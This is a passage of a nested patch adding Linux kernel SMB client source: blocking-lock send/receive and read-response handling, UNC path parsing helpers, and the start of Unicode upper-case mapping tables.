++			add_credits(server, &credits, 0);
++			return rc;
++		}
++		spin_unlock(&server->mid_lock);
++	}
++
++	rc = cifs_sync_mid_result(midQ, server);
++	if (rc != 0) {
++		add_credits(server, &credits, 0);
++		return rc;
++	}
++
++	if (!midQ->resp_buf || !out_buf ||
++	    midQ->mid_state != MID_RESPONSE_RECEIVED) {
++		rc = -EIO;
++		cifs_server_dbg(VFS, "Bad MID state?\n");
++		goto out;
++	}
++
++	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
++	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
++	rc = cifs_check_receive(midQ, server, 0);
++out:
++	delete_mid(midQ);
++	add_credits(server, &credits, 0);
++
++	return rc;
++}
++
++/* We send a LOCKINGX_CANCEL_LOCK to cause the Windows
++   blocking lock to return. */
++
++static int
++send_lock_cancel(const unsigned int xid, struct cifs_tcon *tcon,
++			struct smb_hdr *in_buf,
++			struct smb_hdr *out_buf)
++{
++	int bytes_returned;
++	struct cifs_ses *ses = tcon->ses;
++	LOCK_REQ *pSMB = (LOCK_REQ *)in_buf;
++
++	/* We just modify the current in_buf to change
++	   the type of lock from LOCKING_ANDX_SHARED_LOCK
++	   or LOCKING_ANDX_EXCLUSIVE_LOCK to
++	   LOCKING_ANDX_CANCEL_LOCK. */
++
++	pSMB->LockType = LOCKING_ANDX_CANCEL_LOCK|LOCKING_ANDX_LARGE_FILES;
++	pSMB->Timeout = 0;
++	pSMB->hdr.Mid = get_next_mid(ses->server);
++
++	return SendReceive(xid, ses, in_buf, out_buf,
++			&bytes_returned, 0);
++}
++
++int
++SendReceiveBlockingLock(const unsigned int xid, struct cifs_tcon *tcon,
++	    struct smb_hdr *in_buf, struct smb_hdr *out_buf,
++	    int *pbytes_returned)
++{
++	int rc = 0;
++	int rstart = 0;
++	struct mid_q_entry *midQ;
++	struct cifs_ses *ses;
++	unsigned int len = be32_to_cpu(in_buf->smb_buf_length);
++	struct kvec iov = { .iov_base = in_buf, .iov_len = len };
++	struct smb_rqst rqst = { .rq_iov = &iov, .rq_nvec = 1 };
++	unsigned int instance;
++	struct TCP_Server_Info *server;
++
++	if (tcon == NULL || tcon->ses == NULL) {
++		cifs_dbg(VFS, "Null smb session\n");
++		return -EIO;
++	}
++	ses = tcon->ses;
++	server = ses->server;
++
++	if (server == NULL) {
++		cifs_dbg(VFS, "Null tcp session\n");
++		return -EIO;
++	}
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsExiting) {
++		spin_unlock(&server->srv_lock);
++		return -ENOENT;
++	}
++	spin_unlock(&server->srv_lock);
++
++	/* Ensure that we do not send more than 50 overlapping requests
++	   to the same server. We may make this configurable later or
++	   use ses->maxReq */
++
++	if (len > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
++		cifs_tcon_dbg(VFS, "Invalid length, greater than maximum frame, %d\n",
++			      len);
++		return -EIO;
++	}
++
++	rc = wait_for_free_request(server, CIFS_BLOCKING_OP, &instance);
++	if (rc)
++		return rc;
++
++	/* make sure that we sign in the same order that we send on this socket
++	   and avoid races inside tcp sendmsg code that could cause corruption
++	   of smb data */
++
++	cifs_server_lock(server);
++
++	rc = allocate_mid(ses, in_buf, &midQ);
++	if (rc) {
++		cifs_server_unlock(server);
++		return rc;
++	}
++
++	rc = cifs_sign_smb(in_buf, server, &midQ->sequence_number);
++	if (rc) {
++		delete_mid(midQ);
++		cifs_server_unlock(server);
++		return rc;
++	}
++
++	midQ->mid_state = MID_REQUEST_SUBMITTED;
++	rc = smb_send(server, in_buf, len);
++	cifs_save_when_sent(midQ);
++
++	if (rc < 0)
++		server->sequence_number -= 2;
++
++	cifs_server_unlock(server);
++
++	if (rc < 0) {
++		delete_mid(midQ);
++		return rc;
++	}
++
++	/* Wait for a reply - allow signals to interrupt. */
++	rc = wait_event_interruptible(server->response_q,
++		(!(midQ->mid_state == MID_REQUEST_SUBMITTED)) ||
++		((server->tcpStatus != CifsGood) &&
++		 (server->tcpStatus != CifsNew)));
++
++	/* Were we interrupted by a signal? */
++	spin_lock(&server->srv_lock);
++	if ((rc == -ERESTARTSYS) &&
++		(midQ->mid_state == MID_REQUEST_SUBMITTED) &&
++		((server->tcpStatus == CifsGood) ||
++		 (server->tcpStatus == CifsNew))) {
++		spin_unlock(&server->srv_lock);
++
++		if (in_buf->Command == SMB_COM_TRANSACTION2) {
++			/* POSIX lock. We send an NT_CANCEL SMB to cause the
++			   blocking lock to return. */
++			rc = send_cancel(server, &rqst, midQ);
++			if (rc) {
++				delete_mid(midQ);
++				return rc;
++			}
++		} else {
++			/* Windows lock. We send a LOCKINGX_CANCEL_LOCK
++			   to cause the blocking lock to return. */
++
++			rc = send_lock_cancel(xid, tcon, in_buf, out_buf);
++
++			/* If we get -ENOLCK back the lock may have
++			   already been removed. Don't exit in this case. */
++			if (rc && rc != -ENOLCK) {
++				delete_mid(midQ);
++				return rc;
++			}
++		}
++
++		rc = wait_for_response(server, midQ);
++		if (rc) {
++			send_cancel(server, &rqst, midQ);
++			spin_lock(&server->mid_lock);
++			if (midQ->mid_state == MID_REQUEST_SUBMITTED) {
++				/* no longer considered to be "in-flight" */
++				midQ->callback = release_mid;
++				spin_unlock(&server->mid_lock);
++				return rc;
++			}
++			spin_unlock(&server->mid_lock);
++		}
++
++		/* We got the response - restart system call. */
++		rstart = 1;
++		spin_lock(&server->srv_lock);
++	}
++	spin_unlock(&server->srv_lock);
++
++	rc = cifs_sync_mid_result(midQ, server);
++	if (rc != 0)
++		return rc;
++
++	/* received frame is ok */
++	if (out_buf == NULL || midQ->mid_state != MID_RESPONSE_RECEIVED) {
++		rc = -EIO;
++		cifs_tcon_dbg(VFS, "Bad MID state?\n");
++		goto out;
++	}
++
++	*pbytes_returned = get_rfc1002_length(midQ->resp_buf);
++	memcpy(out_buf, midQ->resp_buf, *pbytes_returned + 4);
++	rc = cifs_check_receive(midQ, server, 0);
++out:
++	delete_mid(midQ);
++	if (rstart && rc == -EACCES)
++		return -ERESTARTSYS;
++	return rc;
++}
++
++/*
++ * Discard any remaining data in the current SMB. To do this, we borrow the
++ * current bigbuf.
++ */
++int
++cifs_discard_remaining_data(struct TCP_Server_Info *server)
++{
++	unsigned int rfclen = server->pdu_size;
++	int remaining = rfclen + HEADER_PREAMBLE_SIZE(server) -
++		server->total_read;
++
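++	/* read and discard the unread remainder in bounded chunks */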
++	while (remaining > 0) {
++		int length;
++
++		length = cifs_discard_from_socket(server,
++				min_t(size_t, remaining,
++				      CIFSMaxBufSize + MAX_HEADER_SIZE(server)));
++		if (length < 0)
++			return length;
++		server->total_read += length;
++		remaining -= length;
++	}
++
++	return 0;
++}
++
++static int
++__cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid,
++		     bool malformed)
++{
++	int length;
++
++	length = cifs_discard_remaining_data(server);
++	dequeue_mid(mid, malformed);
++	mid->resp_buf = server->smallbuf;
++	server->smallbuf = NULL;
++	return length;
++}
++
++static int
++cifs_readv_discard(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	struct cifs_readdata *rdata = mid->callback_data;
++
++	return  __cifs_readv_discard(server, mid, rdata->result);
++}
++
++int
++cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	int length, len;
++	unsigned int data_offset, data_len;
++	struct cifs_readdata *rdata = mid->callback_data;
++	char *buf = server->smallbuf;
++	unsigned int buflen = server->pdu_size + HEADER_PREAMBLE_SIZE(server);
++	bool use_rdma_mr = false;
++
++	cifs_dbg(FYI, "%s: mid=%llu offset=%llu bytes=%u\n",
++		 __func__, mid->mid, rdata->offset, rdata->bytes);
++
++	/*
++	 * read the rest of READ_RSP header (sans Data array), or whatever we
++	 * can if there's not enough data. At this point, we've read down to
++	 * the Mid.
++	 */
++	len = min_t(unsigned int, buflen, server->vals->read_rsp_size) -
++							HEADER_SIZE(server) + 1;
++
++	length = cifs_read_from_socket(server,
++				       buf + HEADER_SIZE(server) - 1, len);
++	if (length < 0)
++		return length;
++	server->total_read += length;
++
++	if (server->ops->is_session_expired &&
++	    server->ops->is_session_expired(buf)) {
++		cifs_reconnect(server, true);
++		return -1;
++	}
++
++	if (server->ops->is_status_pending &&
++	    server->ops->is_status_pending(buf, server)) {
++		cifs_discard_remaining_data(server);
++		return -1;
++	}
++
++	/* set up first two iov for signature check and to get credits */
++	rdata->iov[0].iov_base = buf;
++	rdata->iov[0].iov_len = HEADER_PREAMBLE_SIZE(server);
++	rdata->iov[1].iov_base = buf + HEADER_PREAMBLE_SIZE(server);
++	rdata->iov[1].iov_len =
++		server->total_read - HEADER_PREAMBLE_SIZE(server);
++	cifs_dbg(FYI, "0: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[0].iov_base, rdata->iov[0].iov_len);
++	cifs_dbg(FYI, "1: iov_base=%p iov_len=%zu\n",
++		 rdata->iov[1].iov_base, rdata->iov[1].iov_len);
++
++	/* Was the SMB read successful? */
++	rdata->result = server->ops->map_error(buf, false);
++	if (rdata->result != 0) {
++		cifs_dbg(FYI, "%s: server returned error %d\n",
++			 __func__, rdata->result);
++		/* normal error on read response */
++		return __cifs_readv_discard(server, mid, false);
++	}
++
++	/* Is there enough to get to the rest of the READ_RSP header? */
++	if (server->total_read < server->vals->read_rsp_size) {
++		cifs_dbg(FYI, "%s: server returned short header. got=%u expected=%zu\n",
++			 __func__, server->total_read,
++			 server->vals->read_rsp_size);
++		rdata->result = -EIO;
++		return cifs_readv_discard(server, mid);
++	}
++
++	data_offset = server->ops->read_data_offset(buf) +
++		HEADER_PREAMBLE_SIZE(server);
++	if (data_offset < server->total_read) {
++		/*
++		 * win2k8 sometimes sends an offset of 0 when the read
++		 * is beyond the EOF. Treat it as if the data starts just after
++		 * the header.
++		 */
++		cifs_dbg(FYI, "%s: data offset (%u) inside read response header\n",
++			 __func__, data_offset);
++		data_offset = server->total_read;
++	} else if (data_offset > MAX_CIFS_SMALL_BUFFER_SIZE) {
++		/* data_offset is beyond the end of smallbuf */
++		cifs_dbg(FYI, "%s: data offset (%u) beyond end of smallbuf\n",
++			 __func__, data_offset);
++		rdata->result = -EIO;
++		return cifs_readv_discard(server, mid);
++	}
++
++	cifs_dbg(FYI, "%s: total_read=%u data_offset=%u\n",
++		 __func__, server->total_read, data_offset);
++
++	len = data_offset - server->total_read;
++	if (len > 0) {
++		/* read any junk before data into the rest of smallbuf */
++		length = cifs_read_from_socket(server,
++					       buf + server->total_read, len);
++		if (length < 0)
++			return length;
++		server->total_read += length;
++	}
++
++	/* how much data is in the response? */
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	use_rdma_mr = rdata->mr;
++#endif
++	data_len = server->ops->read_data_length(buf, use_rdma_mr);
++	if (!use_rdma_mr && (data_offset + data_len > buflen)) {
++		/* data_len is corrupt -- discard frame */
++		rdata->result = -EIO;
++		return cifs_readv_discard(server, mid);
++	}
++
++	length = rdata->read_into_pages(server, rdata, data_len);
++	if (length < 0)
++		return length;
++
++	server->total_read += length;
++
++	cifs_dbg(FYI, "total_read=%u buflen=%u remaining=%u\n",
++		 server->total_read, buflen, data_len);
++
++	/* discard anything left over */
++	if (server->total_read < buflen)
++		return cifs_readv_discard(server, mid);
++
++	dequeue_mid(mid, false);
++	mid->resp_buf = server->smallbuf;
++	server->smallbuf = NULL;
++	return length;
++}
+diff --git a/fs/smb/client/unc.c b/fs/smb/client/unc.c
+new file mode 100644
+index 0000000000000..f6fc5e343ea42
+--- /dev/null
++++ b/fs/smb/client/unc.c
+@@ -0,0 +1,69 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2020, Microsoft Corporation.
++ *
++ *   Author(s): Steve French <stfrench@microsoft.com>
++ *              Suresh Jayaraman <sjayaraman@suse.de>
++ *              Jeff Layton <jlayton@kernel.org>
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/inet.h>
++#include <linux/ctype.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++
++/* extract the host portion of the UNC string */
++char *extract_hostname(const char *unc)
++{
++	const char *src;
++	char *dst, *delim;
++	unsigned int len;
++
++	/* skip the leading backslashes */
++	/* BB: check validity of these bytes? */
++	if (strlen(unc) < 3)
++		return ERR_PTR(-EINVAL);
++	for (src = unc; *src && *src == '\\'; src++)
++		;
++	if (!*src)
++		return ERR_PTR(-EINVAL);
++
++	/* delimiter between hostname and sharename is always '\\' now */
++	delim = strchr(src, '\\');
++	if (!delim)
++		return ERR_PTR(-EINVAL);
++
++	len = delim - src;
++	dst = kmalloc((len + 1), GFP_KERNEL);
++	if (dst == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	memcpy(dst, src, len);
++	dst[len] = '\0';
++
++	return dst;
++}
++
++char *extract_sharename(const char *unc)
++{
++	const char *src;
++	char *delim, *dst;
++
++	/* skip the two leading backslashes */
++	src = unc + 2;
++
++	/* share name is always preceded by '\\' now */
++	delim = strchr(src, '\\');
++	if (!delim)
++		return ERR_PTR(-EINVAL);
++	delim++;
++
++	/* caller has to free the memory */
++	dst = kstrdup(delim, GFP_KERNEL);
++	if (!dst)
++		return ERR_PTR(-ENOMEM);
++
++	return dst;
++}
+diff --git a/fs/smb/client/winucase.c b/fs/smb/client/winucase.c
+new file mode 100644
+index 0000000000000..2f075b5b50df0
+--- /dev/null
++++ b/fs/smb/client/winucase.c
+@@ -0,0 +1,649 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ * Copyright (c) Jeffrey Layton <jlayton@redhat.com>, 2013
++ *
++ * The const tables in this file were converted from the following info
++ * provided by Microsoft:
++ *
++ * 3.1.5.3 Mapping UTF-16 Strings to Upper Case:
++ *
++ * https://msdn.microsoft.com/en-us/library/hh877830.aspx
++ * http://www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=10921
++ *
++ * In particular, the table in "Windows 8 Upper Case Mapping Table.txt" was
++ * post-processed using the winucase_convert.pl script.
++ */
++
++#include <linux/nls.h>
++
++wchar_t cifs_toupper(wchar_t in);  /* quiet sparse */
++
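++/*
++ * Second-level tables: t2_XX maps the low byte of a UTF-16 code point whose
++ * high byte is 0xXX to its upper-case equivalent. A zero entry means the
++ * character has no upper-case mapping and is returned unchanged; the
++ * top-level dispatch table indexed by the high byte appears later in the
++ * file.
++ */
++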
++static const wchar_t t2_00[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046, 0x0047,
++	0x0048, 0x0049, 0x004a, 0x004b, 0x004c, 0x004d, 0x004e, 0x004f,
++	0x0050, 0x0051, 0x0052, 0x0053, 0x0054, 0x0055, 0x0056, 0x0057,
++	0x0058, 0x0059, 0x005a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x00c0, 0x00c1, 0x00c2, 0x00c3, 0x00c4, 0x00c5, 0x00c6, 0x00c7,
++	0x00c8, 0x00c9, 0x00ca, 0x00cb, 0x00cc, 0x00cd, 0x00ce, 0x00cf,
++	0x00d0, 0x00d1, 0x00d2, 0x00d3, 0x00d4, 0x00d5, 0x00d6, 0x0000,
++	0x00d8, 0x00d9, 0x00da, 0x00db, 0x00dc, 0x00dd, 0x00de, 0x0178,
++};
++
++static const wchar_t t2_01[256] = {
++	0x0000, 0x0100, 0x0000, 0x0102, 0x0000, 0x0104, 0x0000, 0x0106,
++	0x0000, 0x0108, 0x0000, 0x010a, 0x0000, 0x010c, 0x0000, 0x010e,
++	0x0000, 0x0110, 0x0000, 0x0112, 0x0000, 0x0114, 0x0000, 0x0116,
++	0x0000, 0x0118, 0x0000, 0x011a, 0x0000, 0x011c, 0x0000, 0x011e,
++	0x0000, 0x0120, 0x0000, 0x0122, 0x0000, 0x0124, 0x0000, 0x0126,
++	0x0000, 0x0128, 0x0000, 0x012a, 0x0000, 0x012c, 0x0000, 0x012e,
++	0x0000, 0x0000, 0x0000, 0x0132, 0x0000, 0x0134, 0x0000, 0x0136,
++	0x0000, 0x0000, 0x0139, 0x0000, 0x013b, 0x0000, 0x013d, 0x0000,
++	0x013f, 0x0000, 0x0141, 0x0000, 0x0143, 0x0000, 0x0145, 0x0000,
++	0x0147, 0x0000, 0x0000, 0x014a, 0x0000, 0x014c, 0x0000, 0x014e,
++	0x0000, 0x0150, 0x0000, 0x0152, 0x0000, 0x0154, 0x0000, 0x0156,
++	0x0000, 0x0158, 0x0000, 0x015a, 0x0000, 0x015c, 0x0000, 0x015e,
++	0x0000, 0x0160, 0x0000, 0x0162, 0x0000, 0x0164, 0x0000, 0x0166,
++	0x0000, 0x0168, 0x0000, 0x016a, 0x0000, 0x016c, 0x0000, 0x016e,
++	0x0000, 0x0170, 0x0000, 0x0172, 0x0000, 0x0174, 0x0000, 0x0176,
++	0x0000, 0x0000, 0x0179, 0x0000, 0x017b, 0x0000, 0x017d, 0x0000,
++	0x0243, 0x0000, 0x0000, 0x0182, 0x0000, 0x0184, 0x0000, 0x0000,
++	0x0187, 0x0000, 0x0000, 0x0000, 0x018b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0191, 0x0000, 0x0000, 0x01f6, 0x0000, 0x0000,
++	0x0000, 0x0198, 0x023d, 0x0000, 0x0000, 0x0000, 0x0220, 0x0000,
++	0x0000, 0x01a0, 0x0000, 0x01a2, 0x0000, 0x01a4, 0x0000, 0x0000,
++	0x01a7, 0x0000, 0x0000, 0x0000, 0x0000, 0x01ac, 0x0000, 0x0000,
++	0x01af, 0x0000, 0x0000, 0x0000, 0x01b3, 0x0000, 0x01b5, 0x0000,
++	0x0000, 0x01b8, 0x0000, 0x0000, 0x0000, 0x01bc, 0x0000, 0x01f7,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x01c4, 0x0000,
++	0x0000, 0x01c7, 0x0000, 0x0000, 0x01ca, 0x0000, 0x01cd, 0x0000,
++	0x01cf, 0x0000, 0x01d1, 0x0000, 0x01d3, 0x0000, 0x01d5, 0x0000,
++	0x01d7, 0x0000, 0x01d9, 0x0000, 0x01db, 0x018e, 0x0000, 0x01de,
++	0x0000, 0x01e0, 0x0000, 0x01e2, 0x0000, 0x01e4, 0x0000, 0x01e6,
++	0x0000, 0x01e8, 0x0000, 0x01ea, 0x0000, 0x01ec, 0x0000, 0x01ee,
++	0x0000, 0x0000, 0x0000, 0x01f1, 0x0000, 0x01f4, 0x0000, 0x0000,
++	0x0000, 0x01f8, 0x0000, 0x01fa, 0x0000, 0x01fc, 0x0000, 0x01fe,
++};
++
++static const wchar_t t2_02[256] = {
++	0x0000, 0x0200, 0x0000, 0x0202, 0x0000, 0x0204, 0x0000, 0x0206,
++	0x0000, 0x0208, 0x0000, 0x020a, 0x0000, 0x020c, 0x0000, 0x020e,
++	0x0000, 0x0210, 0x0000, 0x0212, 0x0000, 0x0214, 0x0000, 0x0216,
++	0x0000, 0x0218, 0x0000, 0x021a, 0x0000, 0x021c, 0x0000, 0x021e,
++	0x0000, 0x0000, 0x0000, 0x0222, 0x0000, 0x0224, 0x0000, 0x0226,
++	0x0000, 0x0228, 0x0000, 0x022a, 0x0000, 0x022c, 0x0000, 0x022e,
++	0x0000, 0x0230, 0x0000, 0x0232, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x023b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0241, 0x0000, 0x0000, 0x0000, 0x0000, 0x0246,
++	0x0000, 0x0248, 0x0000, 0x024a, 0x0000, 0x024c, 0x0000, 0x024e,
++	0x2c6f, 0x2c6d, 0x0000, 0x0181, 0x0186, 0x0000, 0x0189, 0x018a,
++	0x0000, 0x018f, 0x0000, 0x0190, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0193, 0x0000, 0x0000, 0x0194, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0197, 0x0196, 0x0000, 0x2c62, 0x0000, 0x0000, 0x0000, 0x019c,
++	0x0000, 0x2c6e, 0x019d, 0x0000, 0x0000, 0x019f, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x2c64, 0x0000, 0x0000,
++	0x01a6, 0x0000, 0x0000, 0x01a9, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x01ae, 0x0244, 0x01b1, 0x01b2, 0x0245, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x01b7, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_03[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0370, 0x0000, 0x0372, 0x0000, 0x0000, 0x0000, 0x0376,
++	0x0000, 0x0000, 0x0000, 0x03fd, 0x03fe, 0x03ff, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0386, 0x0388, 0x0389, 0x038a,
++	0x0000, 0x0391, 0x0392, 0x0393, 0x0394, 0x0395, 0x0396, 0x0397,
++	0x0398, 0x0399, 0x039a, 0x039b, 0x039c, 0x039d, 0x039e, 0x039f,
++	0x03a0, 0x03a1, 0x0000, 0x03a3, 0x03a4, 0x03a5, 0x03a6, 0x03a7,
++	0x03a8, 0x03a9, 0x03aa, 0x03ab, 0x038c, 0x038e, 0x038f, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x03cf,
++	0x0000, 0x03d8, 0x0000, 0x03da, 0x0000, 0x03dc, 0x0000, 0x03de,
++	0x0000, 0x03e0, 0x0000, 0x03e2, 0x0000, 0x03e4, 0x0000, 0x03e6,
++	0x0000, 0x03e8, 0x0000, 0x03ea, 0x0000, 0x03ec, 0x0000, 0x03ee,
++	0x0000, 0x0000, 0x03f9, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x03f7, 0x0000, 0x0000, 0x03fa, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_04[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0410, 0x0411, 0x0412, 0x0413, 0x0414, 0x0415, 0x0416, 0x0417,
++	0x0418, 0x0419, 0x041a, 0x041b, 0x041c, 0x041d, 0x041e, 0x041f,
++	0x0420, 0x0421, 0x0422, 0x0423, 0x0424, 0x0425, 0x0426, 0x0427,
++	0x0428, 0x0429, 0x042a, 0x042b, 0x042c, 0x042d, 0x042e, 0x042f,
++	0x0400, 0x0401, 0x0402, 0x0403, 0x0404, 0x0405, 0x0406, 0x0407,
++	0x0408, 0x0409, 0x040a, 0x040b, 0x040c, 0x040d, 0x040e, 0x040f,
++	0x0000, 0x0460, 0x0000, 0x0462, 0x0000, 0x0464, 0x0000, 0x0466,
++	0x0000, 0x0468, 0x0000, 0x046a, 0x0000, 0x046c, 0x0000, 0x046e,
++	0x0000, 0x0470, 0x0000, 0x0472, 0x0000, 0x0474, 0x0000, 0x0476,
++	0x0000, 0x0478, 0x0000, 0x047a, 0x0000, 0x047c, 0x0000, 0x047e,
++	0x0000, 0x0480, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x048a, 0x0000, 0x048c, 0x0000, 0x048e,
++	0x0000, 0x0490, 0x0000, 0x0492, 0x0000, 0x0494, 0x0000, 0x0496,
++	0x0000, 0x0498, 0x0000, 0x049a, 0x0000, 0x049c, 0x0000, 0x049e,
++	0x0000, 0x04a0, 0x0000, 0x04a2, 0x0000, 0x04a4, 0x0000, 0x04a6,
++	0x0000, 0x04a8, 0x0000, 0x04aa, 0x0000, 0x04ac, 0x0000, 0x04ae,
++	0x0000, 0x04b0, 0x0000, 0x04b2, 0x0000, 0x04b4, 0x0000, 0x04b6,
